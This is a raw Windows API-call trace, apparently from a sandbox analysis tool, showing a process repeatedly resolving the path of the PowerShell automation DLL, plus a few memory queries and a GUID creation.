	[0430.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xdd34e2f3, Data2=0x49a6, Data3=0x45ab, Data4=([0]=0xb8, [1]=0x41, [2]=0xe2, [3]=0xd0, [4]=0xc6, [5]=0x1e, [6]=0x71, [7]=0x4f))) returned 0x0
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.633] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.633] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.633] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.634] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.634] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.634] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.635] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.635] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.635] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.636] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.636] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.637] VirtualQuery (in: lpAddress=0x26b130, lpBuffer=0x26bff0, dwLength=0x30 | out: lpBuffer=0x26bff0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.637] VirtualQuery (in: lpAddress=0x26b1c0, lpBuffer=0x26c080, dwLength=0x30 | out: lpBuffer=0x26c080*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
